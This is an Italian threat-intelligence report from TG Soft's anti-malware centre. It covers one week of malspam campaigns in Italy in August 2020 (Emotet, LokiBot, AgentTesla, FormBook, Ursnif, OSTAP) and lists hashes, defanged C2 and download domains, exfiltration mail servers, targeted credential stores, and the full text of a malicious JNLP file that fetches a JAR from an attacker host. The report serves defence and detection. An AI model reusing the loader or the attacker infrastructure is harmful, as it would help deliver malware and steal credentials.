Selected news item is not available in the requested language.

Italian language proposed.

Close

10/08/2020
10:55

2020W32 Report settimanale => 8-14/08 campagne MalSpam in Italia


Malware veicolati attraverso le campagne: Emotet, LokiBot, AgentTesla, FormBook, Ursnif, OSTAP
       
week32

Report settimanale delle campagne italiane di malspam a cura del C.R.A.M. di TG Soft.

Di seguito i dettagli delle campagne diffuse in modo massivo nella settimana appena trascorsa dal 08 agosto al 14 agosto 2020: Emotet, LokiBot, AgentTesla, FormBook, Ursnif, OSTAP

INDICE

==> 10 agosto 2020 => Emotet (7)

==>
 11 agosto 2020 => Emotet (8), LokiBot (1)

==> 
12 agosto 2020 => Emotet (8), LokiBot (1), AgentTesla (2)

==> 13 agosto 2020 => Emotet (4), FormBook (1), Ursnif (1), OSTAP(1)

==>
 
14 agosto 2020 => Emotet (6)
              

==> Consulta le campagne del mese di Luglio/Agosto


Nella settimana corrente vi è stato un calo delle campagne totali.
Sono però continuate in maniera massiva le campagne atte a distribuire il malware Emotet.
Persistono anche le campagne dell'attore denominato "Hagga" con lo scopo di infettare l'utente con il password stealer LokiBot.
La barra di colore blu indica il numero totale di campagne monitorate in Italia in ogni settimana, invece quella di colore rosso riguardano le campagne scritte in italiano (con target Italia).
In questa settimana sono state 89 le campagne che abbiamo monitorato, di cui 40 sono scritte in lingua italiana.



Per poter capire come sono suddivise le varie settimane (Week) di seguito una piccola tabella che indica la suddivsione dei periodi presi in considerazione:

Settimana
dal al
Week_29 18/07 24/07
Week_30 25/07 31/07
Week_31 01/08 07/08
Week_32 08/08 14/08


Nella settimana corrente il picco totale delle campagne è stato lunedì 10, con 24 campagne di cui 7 con messaggi rivolti direttamente ad utenti italiani, come è evidenziato dal grafico riportato di seguito.
Mercoledì 12 si è rilevato il maggior picco di invii mirati all'utenza italiana, con 11 differenti campagne, grazie principalmente alla distribuzione del malware Emotet.



La grande maggioranza dei sample che ha caratterizzato questa settimana è stata sviluppata in MSIL (C#) e copre il 49,44% dei malware inviati via mail, seguito con il 6,74% di sample in Delphi.
Il 39,33% dei sample distribuiti sono documenti di Office (Word, Excel, PowerPoint), che scaricano altri malware, rappresentati in gran parte dalle campagne Emotet.
Nella figura sottostante possiamo vedere le varie tipologie di linguaggio con cui vengono sviluppati i malware.


Nel seguente grafico vediamo la distribuzione delle varie tipologie di linguaggio divise per giorno:



*Nella categoria JAR sono compresi i file JNLP

EMOTET


Durante la settimana monitorata le campagne malspam di Emotet sono state distribuite dal lunedì 10 a venerdì 14 in varie fasce orarie in maniera massiva.

Di seguito vediamo un esempio di email del 10 agosto:


Abbiamo raggruppato i DOC e domini delle varie campagne che hanno colpito gli utenti italiani. Le campagne Emotet per il loro conteggio non sono state determinate in base all'HASH del documento Word ma bensì ragruppate in cluster in base ai domini di download contenuti nella macro. Se calcolate in base al solo HASH il numero delle campagne sarebbe risultato molto più elevato.

In seguito vediamo un grafico del numero di HASH univoci degli allegati DOC monitorati nell'arco della settimana:



Il maggiore picco di HASH univoci rilevati è stato lunedì 10 con 64 hash seguito a breve distanza da venerdì 14 con 62 hash.
Durante la settimana è stato modificato il template interno dell'allegato DOC malevolo visbile quando aperto, di seguito vediamo l'immagine della nuova grafica:


Il Trojan Emotet scarica come follow-up il malware QakBot.
 
Scarica il file di testo degli IOC delle campagne Emotet.
 
 
 

10 agosto 2020

 Emotet

Vedi il paragrafo principale sul malware Emotet all'inizio.



Torna ad inizio pagina
 

11 agosto 2020

Emotet

Vedi il paragrafo principale sul malware Emotet all'inizio.

 

LokiBot

RICHIESTA DI OFFERTA 8-11-2020.ppt
MD5: E13288F609515D18381EECE2B22C41FD
Dimensione: 88576 Bytes
VirIT: P97M.Downloader.AZ

La mail contiene un allegato PowerPoint "
RICHIESTA DI OFFERTA 8-11-2020.ppt" il quale una volta aperto attraverso l'utilizzo di una MACRO e di successivi passaggi mediante l'utilizzo di Script HTA hostati su pastebin[.]com e di vari script Powershell scarica ulteriori malware.

In questa campagna viene scaricato ed avviato in memoria il password stealer LokiBot:

[ PAYLOAD LOKIBOT ]
MD5: 28C89266D7A638FB9883ECF7930CBBC5
Dimensione: 106496 Bytes
VirIT
Trojan.Win32.Zbot.ASEU

C2 del malware LokiBot: 195.69.140[.]147

Viene creata la persistenza degli script HTA/Powershell attraverso delle chiavi di RUN ed ad un Task.
Si è riscontrato in fase di analisi l'utilizzo di vari metodi per effettuare il Bypass dell'interfaccia di controllo AMSI (Anti-Malware Scan Interface).

Questa campagna è collegata all'attore denominato "Hagga".

Di seguito vediamo la lista degli utenti Pastebin:
  • guccha
  • passion1
  • alphabates3

IOC:
E13288F609515D18381EECE2B22C41FD
28C89266D7A638FB9883ECF7930CBBC5

j.mp/asasdaxaeeedxaskkwasddkaos
s://pastebin.com/raw/9dva5i24
s://pastebin.com/raw/Jm5Rz2YR
s://pastebin.com/raw/8Gp7ddVZ
s://pastebin.com/raw/zdhPrFfU
195.69.140[.]147

12 agosto 2020

 Emotet

Vedi il paragrafo principale sul malware Emotet all'inizio.

 

AgentTesla

pagamento.exe
MD5: C0457593CB4D0DEC93790FC5E7D6F6B6
Dimensione: 669184 Bytes
VirIT: Trojan.Win32.Inejctor.CJK

All'interno dell'archivio compresso "pagamento.ace" è presente il file "pagamento.exe" infetto dal password stealer AgentTesla.

Ruba le credenziali memorizzate attraverso i seguenti software: 
  • Firefox
  • Falkon
  • Icecat
  • Waterfox
  • SmartFTP
  • IceDragon
  • BlackHawk
  • Flock
  • K-Meleon
  • Cyberfox
  • Postbox
  • CoreFTP
  • UCBrowser
  • Pale Moon
  • FileZilla
  • SeaMonkey
  • Thunderbird
  • Outlook
La mail con le credenziali rubate viene inviata attraverso il server SMTP: cpg.radicenter[.]eu  -> 212.47.208[.]136 Porta: 587
La mail a cui vengono inviati i dati: <NOT DISCLOSED>@newallco[.]com

IOC:
C0457593CB4D0DEC93790FC5E7D6F6B6

AgentTesla

Documenti..exe
MD5: CA99F046FFBBB41C4725FB4F07553BAF
Dimensione: 745984 Bytes
VirIT: Trojan.Win32.AgentTesla.CJK

La mail contiene due allegati ZIP con nome diverso ma che contengono lo stesso file.
All'interno dell'archivio compresso è presente un file eseguibile infetto dal password stealer AgentTesla
.

Ruba le credenziali memorizzate attraverso i seguenti software: 
  • Firefox
  • Falkon
  • Icecat
  • Waterfox
  • SmartFTP
  • IceDragon
  • BlackHawk
  • Flock
  • K-Meleon
  • Cyberfox
  • Postbox
  • CoreFTP
  • UCBrowser
  • Pale Moon
  • FileZilla
  • SeaMonkey
  • Thunderbird
  • Outlook
La mail con le credenziali rubate viene inviata attraverso il server SMTP: us2.outbound.mailhostbox[.]com  -> 208.91.199[.]223 Porta: 587
La mail a cui vengono inviati i dati: <NOT DISCLOSED>@waltartosto[.]com

IOC:
CA99F046FFBBB41C4725FB4F07553BAF

LokiBot

RICHIESTA DI OFFERTA 12-08-2020·pdf.exe
MD5: D1C2089823CFF890E73B6F2005DE2A6B
Dimensione: 689152 Bytes
VirIT: Trojan.Win32.LokiBot.CJK

Nella mail è presente l'allegato "RICHIESTA DI OFFERTA 12-08-2020·pdf". Al file manca l'estensione corretta, ma il file di fatto è un archivio .ZIP dove al suo interno è presente il file esegubile "RICHIESTA DI OFFERTA 12-08-2020·pdf.exe" infetto dal password stealer LokiBot.

Ruba le credenziali memorizzate attraverso i seguenti software: 
  • Opera
  • SmartFTP
  • Chrome
  • UCBrowser
  • Firefox
  • Icecat
  • FileZilla
  • Waterfox
  • Postbox
  • BlackHawk
  • CoreFTP
  • IceDragon
  • FTP Navigator
  • Pale Moon
  • Cyberfox
  • Falkon
  • Thunderbird
  • Flock
  • K-Meleon
  • SeaMonkey
  • IncrediMail
  • Outlook
  • LinasFTP
  • MyFTP
  • NovaFTP
  • NppFTP
  • Odin Secure FTP
  • Sherrod FTP
  • Staff-FTP
  • QupZilla
  • FoxMail
  • BlazeFTP
  • EasyFTP
  • FlashFXP
  • FreshFTP
  • FTPGetter
  • DeluxeFTP
  • JaSFTP

IOC:
D1C2089823CFF890E73B6F2005DE2A6B
p://195.69.140[.]147

 
 

 

 Emotet

Vedi il paragrafo principale sul malware Emotet all'inizio.


FormBook

ordine di offerta.exe
MD5: 7576ACF8A1EC7DF0AB7E41F4297A9B84
Dimensione: 1951856 Bytes
VirIT: Trojan.Win32.PSWStealer.CJM

All'interno dell'archivio compresso "07-20-2020_06-59-10-PM.zip" è presente il file "ordine di offerta.exe" infetto dal password stealer FormBook.

IOC:
7576ACF8A1EC7DF0AB7E41F4297A9B84
p://meteoannecy[.]net
p://runzexd[.]com
p://bepbosch[.]com
p://brindesecologicos[.]com
p://office4u[.]info
p://kangen-international[.]com
p://belviderewrestling[.]com
p://joomlas123[.]info

Ursnif

 
 
Previdenza_Sociale.jnlp
MD5: 87655D2CD165C7FF177070CAE7E64251
Dimensione: 613 Bytes
VirIT: Trojan.JNLP.Agent.AV

Previdenza_Sociale.jar
MD5: 354C263EEF1726CF56E214A2FEA350CB
Dimensione: 6515 Bytes
VirITTrojan.Java.Agent.CJM


nazionale.exe [ PAYLOAD URSNIF ]
MD5: 8F3156BA5435223BB30229EB2E2C4234
Dimensione: 229724 Bytes
VirIT
Trojan.Win32.Ursnif.CJM

Versione: 250154
Gruppo: 8988
Key: 10291029JSJUYNHG

La mail contiene in allegato il file "Previdenza_Sociale.jnlp", si tratta di un file JNLP (Java Network Launching Protocol) utilizzato per avviare file Java attraverso il sistema Java Web Start.

Di seguito vediamo il contenuto del file:
<?xml version="1.0" encoding="utf-8"?>
<jnlp spec="1.0+" codebase="http://social[.]interactivegood[.]com" href="Previdenza_Sociale.jnlp">
   <information>
      <title>Previdenza Sociale</title>
      <vendor>Istituto Nazionale Previdenza Sociale</vendor>
      <homepage href="www.inps.gov.it"/>
      <description>Previdenza Sociale</description>
      </information>
   <security>
      <all-permissions/>
   </security>
   <resources>
      <j2se version="1.6+" />
      <jar href="Previdenza_Sociale.jar" />
   </resources>
     <application-desc main-class="Previdenza">
   </application-desc>
</jnlp>

Come si può vedere il file JNLP carica il file JAR dal sito http://social[.]interactivegood[.]com
Una volta avviato il file java "Previdenza_Sociale.jar" viene quindi scaricato il Payload del malware Ursnif dal sito line.smartinteractivetech[.]com
Il malware Ursnif si collega al server di comando e controllo: gstat.rayzacastillo[.]com

IOC:
87655D2CD165C7FF177070CAE7E64251
354C263EEF1726CF56E214A2FEA350CB
8F3156BA5435223BB30229EB2E2C4234
social.interactivegood[.]com
line.smartinteractivetech[.]com
gstat.rayzacastillo[.]com


OSTAP

fattura.xls
MD5: ECBB3CFB26F099224AC12FFE9B7980C2
Dimensione: 69125 Bytes
VirITX97M.Ostap.CJO

[FILE AUTOESTRAENTE]
MD5: 50D2520E046DE10757E1D9DD44DE1007
Dimensione: 122880 Bytes
VirITTrojan.Win32.Dropper.AHJ

Wouldbe.jse
MD5: 840A0E2F0A5931051AC0C9CB5496324A
Dimensione: 711818 Bytes
VirITTrojan.JS.OStap.CJO

Aprendo il file excel "fattura.xls" viene richiesta una password, una volta inserita viene attivata una macro che scarica un file autoestraente dal sito gameplays[.]fun viene quindi estratto ed avviato il payload in JavaScript dell'Ostap

IOC:
ECBB3CFB26F099224AC12FFE9B7980C2
50D2520E046DE10757E1D9DD44DE1007
840A0E2F0A5931051AC0C9CB5496324A
p://gameplays[.]fun


Emotet

Vedi il paragrafo principale sul malware Emotet all'inizio.


Consulta le campagne del mese di Luglio/Agosto

Vi invitiamo a consultare i report del mese di Luglio/Agosto, per rimanere aggiornati sulle campagne di malspam circolanti in Italia:

01/08/2020 = Report settimanale delle campagne italiane di MalSpam dal 01 agosto al 08 agosto 2020
25/07/2020 = Report settimanale delle campagne italiane di Malspam dal 25 luglio al 31 luglio 2020
18/07/2020 = Report settimanale delle campagne italiane di Malspam dal 18 luglio al 24 luglio 2020
11/07/2020 = Report settimanale delle campagne italiane di MalSpam dal 11 luglio al 17 luglio 2020

C.R.A.M. 
Centro Ricerche Anti-Malware di TG Soft 
Any information published on our site may be used and published on other websites, blogs, forums, facebook and/or in any other form both in paper and electronic form as long as the source is always and in any case cited explicitly “Source: CRAM by TG Soft www.tgsoft.it” with a clickable link to the original information and / or web page from which textual content, ideas and / or images have been extrapolated.
It will be appreciated in case of use of the information of C.R.A.M. by TG Soft www.tgsoft.it in the report of summary articles the following acknowledgment/thanks “Thanks to Anti-Malware Research Center C.R.A.M. by TG Soft of which we point out the direct link to the original information: [direct clickable link]”

Vir.IT eXplorer PRO is certified by the biggest international organisation: